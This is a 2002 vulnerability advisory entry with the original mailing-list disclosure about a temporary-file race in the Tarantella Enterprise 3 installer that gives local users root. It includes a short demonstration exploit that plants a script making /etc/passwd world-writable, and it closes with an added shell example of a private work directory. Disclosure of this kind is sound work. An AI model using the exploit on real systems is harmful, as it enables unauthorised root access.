Tarantella Enterprise Application Server Uses Unsafe Temporary Files During Installation, Allowing Local Users to Obtain Root Privileges on the System
|
Date: Jan 26 2002
|
Impact: Execution of arbitrary code via local system, Root access via local system
|
Exploit Included: Yes
|
Version(s): 3
|
Description: An installation vulnerability has been reported in Tarantella Enterprise 3. A local user can obtain root access to the system during installation.
Vapid Labs reported that the Tarantella installation script handles certain utility packages in an unsafe manner during installation.
A root-owned file compression utility "gunzip" is apparently created in the /tmp directory with world-writable permissions. The
process ID is appended to the filename (e.g., /tmp/gunzip16152). A local user can inject malicious code into this temporary file
after the file is created but before it is executed by the Tarantella installation script. Then, when the script executes the
file, the malicious code runs with root-level permissions.
A demonstration exploit script is provided:
$ echo "#!/bin/sh" > /tmp/test.sh
$ echo "chmod 777 /etc/passwd" >> /tmp/test.sh
$ cat /tmp/test.sh > /tmp/gunzip16152
|
Impact: A local user can execute arbitrary code on the server with root privileges while the software is being installed.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.tarantella.com/products/e3/
|
Cause: Access control error
|
Underlying OS: Linux (Any), UNIX (AIX), UNIX (HP/UX), UNIX (Open UNIX-SCO), UNIX (Solaris - SunOS), UNIX (Tru64)
|
Underlying OS Comments: Tested on Linux Debian 2.2
|
Reported By: "Larry W. Cashdollar" <lwc@vapid.dhs.org>
|
Message History:
None.
|
Source Message Contents
|
Date: Sat, 26 Jan 2002 09:46:34 -0500 (EST)
From: "Larry W. Cashdollar" <lwc@vapid.dhs.org>
Subject: [VulnWatch] Vulnerability report for Tarantella Enterprise 3.
|
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Vapid Labs
Larry W. Cashdollar
1/14/2002
Vulnerability report for Tarantella Enterprise 3.
1. local root compromise during installation:
The installation script provided with Tarantella handles utility
packages during installation insecurely. A root owned binary "gunzip"
is created in /tmp with world writeable permissions, the pid is appended
to the filename.
TMP_GUNZIP=$TMPDIR/gunzip$$
$ ls -l /tmp/gunzip16152
- -rwxrwxrwx 1 root root 51808 Jan 14 00:15 gunzip16152
gunzip is extracted:
extract gunzip > "$TMP_GUNZIP" 2>>$SHXLOGFILE
extract gunzip | uncompress > "$TMP_GUNZIP" 2>>$SHXLOGFILE
The permissions of gunzip are changed to rwx for all:
chmod 777 $TMP_GUNZIP >/dev/null 2>&1
The binary is used during installation:
extract $efilename | $TMP_GUNZIP -q > "$efilename"
2. Exploit:
There is a race condition between when gunzip is extracted and when it is used
during installation, at which time a malicious local user could inject code to
compromise the system quickly.
$ echo "#!/bin/sh" > /tmp/test.sh
$ echo "chmod 777 /etc/passwd" >> /tmp/test.sh
$ cat /tmp/test.sh > /tmp/gunzip16152
I was able to change the permissions of /etc/passwd to 777 by performing the
above as an unprivileged user.
3. Recommendations:
Perhaps create a directory in /tmp or /var/tmp and use that directory as a
work place?
umask 077
mkdir /tmp/workdir
4. Software: Tarantella Enterprise 3
http://www.tarantella.com/download/e3/
Tested on Linux Debian 2.2
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (FreeBSD)
Comment: For info see http://www.gnupg.org
iD8DBQE8QmV21hSQ6Gxh/KoRAhYIAJ0aDduF4k/fHV1O+24W8C6uNkokIwCgp2OL
gaJAw7urwOy0Ue03nEjlH2Q=
=TdDa
-----END PGP SIGNATURE-----
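The private work directory recommended in the report, written out as an added example (it is not Tarantella's installer code and not part of the original message). The function names are hypothetical, and the staged helper is a constructed stand-in for the extracted gunzip binary.

```shell
#!/bin/sh
# Added example: stage a helper in a private, unpredictable directory instead
# of a world-writable /tmp/gunzip$$. Function names are hypothetical.

# Create a work directory with a random suffix; mktemp -d creates it mode 0700.
make_workdir() {
    mktemp -d "${TMPDIR:-/tmp}/install.XXXXXXXXXX"
}

# Write stdin to $1/$2 as a NEW file, executable by the owner only.
# noclobber (set -C) makes the redirection fail if the file already exists,
# so a pre-planted file is never reused.
stage_helper() {
    (
        umask 077
        set -C
        cat > "$1/$2" || exit 1
        chmod 700 "$1/$2"
    )
}

# Return 0 only if the path has no group or other permission bits set.
is_private() {
    [ "$(ls -ld "$1" 2>/dev/null | cut -c5-10)" = "------" ]
}

# Demo: the helper content below is constructed for this example.
workdir=$(make_workdir) || exit 1
trap 'rm -rf "$workdir"' EXIT
printf '#!/bin/sh\necho helper ran\n' | stage_helper "$workdir" gunzip || exit 1
# Refuse to execute the helper unless both it and its directory are private.
is_private "$workdir" && is_private "$workdir/gunzip" && "$workdir/gunzip"
```

A file left mode 777, as in the advisory's listing, fails the `is_private` check and is never executed.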